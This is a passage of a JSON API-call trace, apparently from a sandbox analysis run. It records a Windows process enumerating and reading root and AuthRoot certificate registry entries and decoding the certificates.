"Y\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\\x00\\x00\\x00E\\x00C\\x00D\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x003\\x008\\x004\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe8G\\xc8B\\x9a\\xb0\\x9d\\xaeo\\x0b(;\\x98\\x15\\x8f\\xe3\\xb1\\xe8\\x80\\xb2\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x03\\xd1\\xc7ge\\xed\\xa8\\x8b\\xc8\\xe0\\x87^`\\x91\\xd0`C%C\\xd1\\x80\\xbc\\xb8l\\x06I6\\xad\\xb9A\\xc4!cx\\x0b\\x82\\x89\\x92\\x1a\\x94\\xfe\\xbb\\x7f\\x9eG\\xed\\xac\\x12\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x007\\x94)X\\x86*\\x06\\xe6\\xbb\\xcf\\xd7\\xabY\\xc7\\xf2\\xf6c\\xec\\xdf@0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r970110070000Z\\x17\r201231070000Z0p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft R" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\A43489159A520F0D93D032CCAF37E7FE20A8B419\\Blob" + } + ], + "repeated": 0, + "id": 1538 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1539 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x04\\x120\\x82\\x02\\xfa\\xa0\\x03\\x02\\x01\\x02\\x02\\x0f\\x00\\xc1\\x00\\x8b<<\\x88\\x11\\xd1>\\xf6c\\xec\\xdf@0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r970110070000Z\\x17\r201231070000Z0p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microso" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1540 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "10" + } + ], + "repeated": 0, + "id": 1541 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "BE36A4562FB2EE05DBB3D32323ADF445084ED656" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656" + } + ], + "repeated": 0, + "id": 1542 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob" + } + ], + "repeated": 1, + "id": 1543 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00560000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1544 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe8\\xa5\\x98\\xbe\\x84\\x82\\x8e\\xfe\\xaep\\x11\\x15\\x015v\\xb2\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x7ffzq\\xd3\\xebix \\x9aQ\\x14\\x9d\\x83\\xda \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xbe6\\xa4V/\\xb2\\xee\\x05\\xdb\\xb3\\xd3##\\xad\\xf4E\\x08N\\xd6V\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00.\\x00\\x00\\x00T\\x00h\\x00a\\x00w\\x00t\\x00e\\x00 \\x00T\\x00i\\x00m\\x00e\\x00s\\x00t\\x00a\\x00m\\x00p\\x00i\\x00n\\x00g\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x18\\x1c+\\xe0XQ\\xf9i\\x93\\xe1\\x96\\xf2y\\x95K#\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdd\\xbc\\xbd\\x86\\x9c?\\x07\\xed@\\xe3\\x1b\\x08\\xef\\xce\\xc4\\xd1\\x88\\xcd;\\x15 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xa5\\x02\\x00\\x000\\x82\\x02\\xa10\\x82\\x02\n\\xa0\\x03\\x02\\x01\\x02\\x02\\x01\\x000\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r\\x06\\x03U\\x04\n\\x13\\x06Thawte1\\x1d0\\x1b\\x06\\x03U\\x04\\x0b\\x13\\x14Thawte Certification1\\x1f0\\x1d\\x06\\x03U\\x04\\x03\\x13\\x16Thawte Timestamping CA0\\x1e\\x17\r970101000000Z\\x17\r201231235959Z0\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\BE36A4562FB2EE05DBB3D32323ADF445084ED656\\Blob" + } + ], + "repeated": 0, + "id": 1545 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1546 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02\\xa10\\x82\\x02\n\\xa0\\x03\\x02\\x01\\x02\\x02\\x01\\x000\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bDurbanville1\\x0f0\r\\x06\\x03U\\x04\n\\x13\\x06Thawte1\\x1d0\\x1b\\x06\\x03U\\x04\\x0b\\x13\\x14Thawte Certification1\\x1f0\\x1d\\x06\\x03U\\x04\\x03\\x13\\x16Thawte Timestamping CA0\\x1e\\x17\r970101000000Z\\x17\r201231235959Z0\\x81\\x8b1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02ZA1\\x150\\x13\\x06\\x03U\\x04\\x08\\x13\\x0cWestern Cape1\\x140\\x12\\x06\\x03U\\x04\\x07\\x13\\x0bD" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1547 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "11" + } + ], + "repeated": 0, + "id": 1548 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "CDD4EEAE6000AC7F40C3802C171E30148030C072" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072" + } + ], + "repeated": 0, + "id": 1549 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob" + } + ], + "repeated": 1, + "id": 1550 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x009\\x1b\\xe9(\\x83\\xd5%\t\\x15[\\xfe\\xae'\\xb9\\xbd4\\x01p\\xb7k\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00J\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x00i\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x02\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa4 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x9d\\x05\\x00\\x000\\x82\\x05\\x990\\x82\\x03\\x81\\xa0\\x03\\x02\\x01\\x02\\x02\\x10y\\xad\\x16\\xa1J\\xa0\\xa5\\xadLsX\\xf4\\x07\\x13.e0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate Authority0\\x1e\\x17\r010509231922Z\\x17\r210509232813Z0_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate A" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\CDD4EEAE6000AC7F40C3802C171E30148030C072\\Blob" + } + ], + "repeated": 0, + "id": 1551 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1552 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x05\\x990\\x82\\x03\\x81\\xa0\\x03\\x02\\x01\\x02\\x02\\x10y\\xad\\x16\\xa1J\\xa0\\xa5\\xadLsX\\xf4\\x07\\x13.e0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certificate Authority0\\x1e\\x17\r010509231922Z\\x17\r210509232813Z0_1\\x130\\x11\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\\x03com1\\x190\\x17\\x06\n\t\\x92&\\x89\\x93\\xf2,d\\x01\\x19\\x16\tmicrosoft1-0+\\x06\\x03U\\x04\\x03\\x13$Microsoft Root Certi" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1553 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1554 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1555 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1556 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1557 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1558 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1559 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1560 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1561 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1562 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1563 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\" + } + ], + "repeated": 0, + "id": 1564 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1565 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\xffd4\\xff97\\xff93A\\xffa1\\xff8f\\xffdb\\x01\\x00\\x00\\x00\\x00\t\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1566 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 1567 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43" + } + ], + "repeated": 0, + "id": 1568 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob" + } + ], + "repeated": 1, + "id": 1569 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00t\\x99f\\xce\\xcc\\x95\\xc1\\x87A\\x94\\xcar\\x03\\xf9\\xb6 